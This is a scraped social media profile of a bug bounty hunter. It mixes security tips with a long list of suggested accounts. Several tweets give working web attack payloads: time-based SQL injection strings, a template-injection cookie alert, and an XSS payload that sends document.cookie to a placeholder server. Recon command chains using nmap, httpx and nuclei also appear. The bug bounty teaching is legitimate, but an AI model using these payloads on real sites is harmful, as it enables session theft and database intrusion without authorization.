Sandip Das @sandevsec
❌Whoami?❌ 👨💻Security Researcher 🖥️Btech in CSE 👨💻Penetration Tester 💻Programmer 🐞Bug Hunter 🇮🇳CTF Player Joined February 2021-
Tweets477
-
Followers36
-
Following564
-
Likes465
I just unlocked endless possibilities at @infosechire🚀 Early access form: forms.gle/6ANLCE1f2Sbjuc…. I filled the form to fast-track my success. You can too! Thanks @bsidesahmedabad Bonus:🎁Fill the form and enter to win exclusive InfoSecHire swag – only 10 spots!🛡️#InfoSecHire
Let's find some DOM-based Vulnerabilities [ DOM XSS & Open Redirections ] Tips 1. Always Check ?returnurl=, ?next= and other redirection parameters before login. #bugbountytipes
Bug Bounty Hint How to test for SQL injection 1) Select params for testing in: 🔹 URL query 🔹 POST body 🔹 Headers 🔹 Cookies It can be any parameter. Typically, I test integer parameters first. 🧵 1/8
Authorized camera access via Safari UXSS: the story of how a shared iCloud document can hack every website you've ever visited. ryanpickren.com/safari-uxss
All praise is due to Allah alone❤ I earned $2,947 for my submission on @Hacker0x01 . Bug: Reflected XSS leads to permanent account takeover. #BugBounty #xss #BugBountytip #BugBountytips #payload #hackerone #xsspayload #BugBounty #xsspayloads #TogetherWeHitHarder
Time based SQLI -> forgot password endpoint: 🫰 1./ Payload : '%2b(select*from(select(sleep(20)))a)%2b' 2./ Endpoint: /Forgot password #infosec #cybersec #bugbountytip
Get CIDR ranges owned by an organisation with asnmap, extract domain names using dnsx then check for CDNs, WAFs and cloud providers with cdncheck! 💡 Install these tools: asnmap 👉 github.com/projectdiscove… dnsx 👉 github.com/projectdiscove… cdncheck 👉 github.com/projectdiscove…
🔍🌐 Looking for vulnerabilities? Check out this Shodan dorks collection! 💻 husseinphp.github.io/shodan/ #bugbountytips #bugbounty #cybersecurity #Pentesting #Hacking #bugcrowd #Hackerone
shodan.io ask for membership!! 💵💵 Not to worry Try hunter.how 🚀 #BugBounty
Another Great tool by @divadbate 👉Plution👈 It is Prototype pollution scanner using headless chrome. #BugBountytips #BugBounty
I hate recon but here a good tip : 1 - Get the company IPs range X.X.X.X/24 2 - Run nmap -p 80,448,8080 IP/24 -oN file.txt 3 - Use any IP extractor or API in case of automation or bash then save it on IPs.txt 4- run httpx -l IPs.txt -o final.txt 5 - run nuclei -l final.txt
SQL injection in one of the biggest shopping website in the world Payload: 0'XOR(if(now()=sysdate(),sleep(6),0))XOR' #BugBountytips #BugBounty #infosec #Hackerone
Client-Side Template Injection Tips {{3*3}} = 9 {{5*3}} = 15 Your alert cookie with {{constructor.constructor('alert(document.cookie)')()}} #bugbountytips #bugbounty #cybersecurity #Pentesting #Hacking #bugcrowd #Hackerone #CSTI
JS for Bug Hunters 🛹 👉🏻 Items You Should Be Searching For 🔍 👉🏻 How to Extract JS File 🔧 👉🏻 Use Nuclei Exposures Tag 🗝️ github.com/NafisiAslH/Kno… #bugbountytip
All praise is due to Allah alone❤ I earned $1,316 for my submission on @Hacker0x01 Bug: XSS to information Disclosure. I have used double URL encoded version of this payload: <img src="x" onerror="fetch('http://yourserver/?cookie=' + encodeURIComponent(document.cookie));">
/search-results.html?q=[payload] payload:%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E simple just find correct parameters and check this #xss #bugbounty
WPScan - Best Flags 🔥 wpscan --url https://example[.]com --api-token <api token> --plugins-detection mixed -e vp,vt,cb,dbe,u1-10 --force A thread 🧵👇
Nuclei + Paramspider = NucleiFuzzer (Automation) Tool Link: github.com/0xKayala/Nucle… #BugBountyTips #BugBounty #NucleiFuzzer #InfoSec
🚨Nuxt.Js Vulnerabilities 🔥 @pdnuclei 1. Arbitrary File Read in Dev Mode - Nuxt.js [high] 2. Semi Arbitrary File Read in Dev Mode - Nuxt.js [medium] 3. Error Page XSS - Nuxt.js [medium] Nuclei Template - github.com/projectdiscove… #bugbounty #hackwithautomation #pdteam
webview @gancc_1
9 Followers 768 Following
Seeker @iamSeeker_
53 Followers 2K Following
Catherine Greenwood �... @CateGreenw75684
2K Followers 6K Following you can follow me Instagram @rhoadescate and blue-sky @categreenwood1971.bsky.social come and give me a follow make my day🤍🤍🤍🤍🤍
OИᑌИ(C)ᑌ{KÖY} @9koyunmultecisi
437 Followers 5K Following yâ kebîkec,ヾ(⌐■_■)ノ♪ herşeyi bilenler arasında kalmış tek cahil hukuk/ekonomi/savunma sanayi/bilişim/A. Bug hunt3r
Keval Kalavadiya @KevalKalav72763
0 Followers 8 Following
Marwan Elsayyad @0xMalWan
788 Followers 1K Following The power of I can. this can't be resisted Long live a man, die your body, live your name If life is just a moment, live it in Break rules-Abuse-full control
Muhammad Farhad Ansar... @fteagleeye1
701 Followers 3K Following Fundamentalist Muslim | Student | Bug Bounty Hunter
Niraj Mahajan @niraj1mahajan
2K Followers 675 Following Microsoft 2024, 2025 MVR | #BugBounty Hunter | Application Security | Discovered 11x CVEs
mohnqwerty @mohnqwerty2
236 Followers 1K Following introvert , wannabe {{hacker}} https://t.co/uvHRWryHDw
Hasan Khan @Hasan_Khan0X
1K Followers 2K Following Software & Web Application Penetration Security Testing Engineer | Bug Bounty Hunter | White Hat Hacker | Cyber Security Expert
Moin Khokhar @sil3ntknight46
193 Followers 388 Following Security Researcher Bug Bounty Hunter Android and Web Hunter
Abdullahi Idris @Edreex
794 Followers 5K Following A cool and gentle guy but very crazy when its come to National issues...am a patriotic citizen of Nigeria... U say rubbish about Nigeria, I rubbish u
Gopal Koppal @Gopal_Koppal
14 Followers 56 Following
B4MB1 @Ofri_Ou
485 Followers 161 Following Cyber Security Researcher | Developed Open Source Tool (MI-X) | Writing Research Blog Posts
HuntLike.pro @Huntlikepro
216 Followers 2K Following Hacker, Friend, Blockchain Enthusiast , Developer
0V3RR1D3 @techitupke
3 Followers 164 Following
Praveen Kumar @Praveen73720670
219 Followers 2K Following Jai Shree Ram 🙏 Bug Bounty Hunter, Hack For Good :)
Elliot Parfitt @ParfittElliot
361 Followers 1K Following Working with THE Bug Bounty Marketplace - @Immunefi DeFi Web3, Whitehat Hackers - CONNECT & DO SOME GOOD
mshoeb2u @ishoeb0x1
63 Followers 433 Following Cyber security consultant • Engineer • Traveller • Infosec • Bug bounty • Foodie • Ofcourse Biryani 🧑💻💯♟️🏊♂️
high @jamlovver
23 Followers 982 Following
Thinkst Canary @ThinkstCanary
13K Followers 10K Following Most companies only realise they are breached when informed by a 3rd party. This is a stupid problem! Thinkst Canary. Know. When it Matters.
0xRAYAN 🇸🇦 @0xRAYAN7
6K Followers 332 Following Cyber Security Expert CRTL,OSWE,OSCP,eWAPTx,eWAPT,CKA,CDP
Md Ismail Šojal �... @0x0SojalSec
30K Followers 5K Following Cyber_Security_Re-searcher || 0SINT || Malware Analysis II Pwn || Ai Re-searcher || Project @AIStrikeSec || 0ld Accounts Suspended @0xSojalSec ||
Rudal kumar sahni @Rudalkumarsahn1
21 Followers 479 Following
Farhan Islam Shafin @shafinxcvi
288 Followers 152 Following Bugbounty hunter | College student | Ambitious | 💻
Rikesh Baniya @rikeshbaniya
5K Followers 437 Following i love graphql | 🇳🇵| blogs : https://t.co/B9UAv5l2cu
me_dheeraj @Dheerajmadhukar
4K Followers 1K Following Director | Trainer at CDAC Under The Ministry of Electronics and Information | Corporate Trainer at Indian Air Force Under the Ministry of Defense ... Jai Hind
H1 Disclosed - Public... @h1Disclosed
10K Followers 1 Following User friendly unofficial HackerOne public disclosures, keeps you updated about the recently disclosed bugs. Made With ♥ By Hackers For Hackers. - @rohsec
Ali Jujara @alijujara7
87 Followers 183 Following Certified Ethical Hacker - C |EH, Penetration Tester, Security Enthusiast, Mobile Application Security
Yashas 🇮🇳 @Yashasv1234
5 Followers 267 Following Ethical Hacker | Application Security | VA-PT | Bug bounty Hunter | Security Researcher | Threat hunting | Soc analyst | AI
Deev Pal @techycodec08
5K Followers 103 Following Security Engineer @ Meta | Ex - SAP | Trying to be a full time Bug Bounty Hunter
VAIDIK PANDYA @h4x0r_fr34k
8K Followers 530 Following Escape the ordinary! Building: @tcb_securities 🔲 Explorer 🔲 CyberSecurity Enthusiast🔲 YouTuber Click here👇
Rudra Sarkar @rudr4_sarkar
2K Followers 1K Following CPTS • Synack Red Team Member • Security Engineer
₦฿₭ - Paw / Pwn... @nbk_2000
972 Followers 169 Following Infinite growth forever. https://t.co/VoLW3PJMOP
Dominik Małowiecki @5up3rD43m0n
418 Followers 687 Following CISO, Pentester, doing Triage and BugBounty management, click on the link to find more -.0
Rojan Rijal @mallocsys
930 Followers 39 Following Offensive security research & building @OphionSecurity
Sebastian @sebastian_paul
891 Followers 1K Following Interested in all things Security, Security Governance and AppSec. Occasional conference speaker. Opinions are my own, and not afraid to change them.
Lucian Nitescu 🇷�... @LucianNitescu
924 Followers 1K Following Red Team Tech Lead / Senior Penetration Tester at Bit Sentinel, CTF Organizer at @DefCampRO, Bug Bounty Hunter at @Bugcrowd and @Hacker0x01
Sheeraz Ali @beingsheerazali
1K Followers 774 Following Content Engineer @hackthebox_eu aka Pwnmeow #OSCP | lead @nullbhopal | Organiser @seasides_conf | Contributor @codevigilant | Personal Twitter| 20+CVEs #infosec
Fazalu Rahman @f4z41u
178 Followers 242 Following The one from @seasides_conf Building @novellaoffl Cyber Security
Vedant Jain @Vedant__Jain
189 Followers 898 Following Indian🇮🇳 | Information Security Engineer | OSCP | CRTP | AWS Security | Ex-Mastercard
sunita @0ddblade
171 Followers 71 Following Android & RN App Developer | new girl into infosec | Volunteer at @seasides_conf
null Delhi @nullDelhi
1K Followers 51 Following Official page of Delhi (NCR) chapter of @null0x00 #null0x00 - https://t.co/cDnqnRkruA… - https://t.co/v2p1JyPSPk - https://t.co/WLeI3ClBU9
𝚖𝚎𝚛𝚝 🦧 @mertistaken
8K Followers 484 Following mert tasci, bug bounty hunter / hacker / all-time rank#2 on @bugcrowd (https://t.co/8gDfLd2CTA)
Shreya Pohekar @shreyapohekar
3K Followers 635 Following Security @microsoft | Ex-hackerone | Contributor @codevigilant | 49 CVEs | Building CTFs at @Winja_CTF | blogger
Stephanie Calabrese @fromsteph2u
322 Followers 328 Following
Tom Gallagher @secbughunter
2K Followers 200 Following Vice President of Engineering, Microsoft Security Response Center (MSRC)
Rebecca Pattee @RebeccaPattee
202 Followers 360 Following Frequent flyer @awayfromoffice. Hiking enthusiast. Cat lover. (She/Her). Curation Ops @Twitter
Arshad Kazmi @arshadkazmi42
2K Followers 389 Following 🔍 https://t.co/y9nGPrujbt | 🕵️ https://t.co/Nz4OeuRYu5 | https://t.co/I4vk04GP2P | https://t.co/cfGDVsjRYF | https://t.co/4ewaqt7N23
Indus Appstore @IndusAppstore
4K Followers 3 Following We are Indus Appstore, redefining the way you discover and experience apps. Explore a new era of app discovery and start your journey today!
Ministry of Electroni... @GoI_MeitY
1.0M Followers 313 Following भारत सरकार की इलेक्ट्रॉनिकी और सूचना प्रौद्योगिकी मंत्रालय की आधिकारिक ट्विटर Official Twitter of Ministry of Electronics & Information Technology Gov of India
Digital India @_DigitalIndia
2.1M Followers 356 Following This is the Official Twitter Account of Digital India, a flagship programme of the Government of India.
NIC @NICMeity
116K Followers 41 Following This is the official Twitter handle of National Informatics Centre (NIC), Government of India.
C-DAC India @cdacindia
23K Followers 158 Following C-DAC is the premier R&D organization of the MeitY, Govt. of India to carry out R&D in IT, Electronics and associated areas.
StrangeBee @StrangeBee
1K Followers 11 Following We make TheHive & Cortex, the beloved Security Incident Response Platform trusted by the world's leading SOC, CERT and CSIRT teams.
Arunim Shukla @arunim_shukla
678 Followers 1K Following Web3 security company's fav marketer | Ex- @Olympix_ai, @Immunefi and @QuillAudits_ai • BUIDLing @RazzorSec by night • 23 YO 🎅
Naina Malik @Naina___Malik
3K Followers 126 Following A Girl who can Hack 🤘| Ethical Hacker | Security Researcher | Crime Investigator 🇮🇳 #scorpion🦂
Ascensus @AscensusInc
956 Followers 138 Following 5,600+ associates helping over 15 million Americans save for the future. Our engagement guidelines: https://t.co/e6KT0UmAKv
Richa @richa_behl_
86 Followers 147 Following Associate Penetration Tester @security_lit | Bug Hunter
HackTube5 @HackTube5
2K Followers 205 Following Ethical hacker, bug bounty hunter, penetration tester YouTube: https://t.co/00zx9c9zu6 For business q: [email protected]
SΞCURΞUM @TheSecureum
13K Followers 1 Following Secureum = Security + Ethereum Founder: @0xRajeev Discord: https://t.co/m9fMLfXhEU
Kongsec - Cyber Merch @kong_sec
555 Followers 2 Following Monarch of Cyber World - By Hackers For Hackers
CERT-In @IndianCERT
46K Followers 29 Following Official Twitter handle of Indian Computer Emergency Response Team, Ministry of Electronics & Information Technology, Government of India
Mobile Hacker @androidmalware2
54K Followers 49 Following Mobile Offensive Security 🔴 #redteam Android Reverse Engineering | malware analysis
Ankita Dhakar @expankita
5K Followers 279 Following Co-Founder and CEO @capturethebugs | Managing Director @security_lit | Cybersecurity enthusiast 🥷 Building AI-powered Vulnerability Intelligence Platform 🇳🇿
Qualys @qualys
34K Followers 4K Following The pioneer and leading provider of disruptive cloud-based security, compliance and IT solutions.
Tenable @TenableSecurity
87K Followers 227 Following Welcome to Tenable. Your exposure ends here. Cloud Exposure | Vulnerability Exposure | OT Exposure | Identity Exposure
Threatsys Technologie... @threatsys
133 Followers 34 Following 🏆Leading Cyber Security Company 🥇Trusted by World’s Top Brands 🥇We Protects $1Billions Transactions every year 🤝Let’s Eradicating ThreatsTrends for United States
You might like
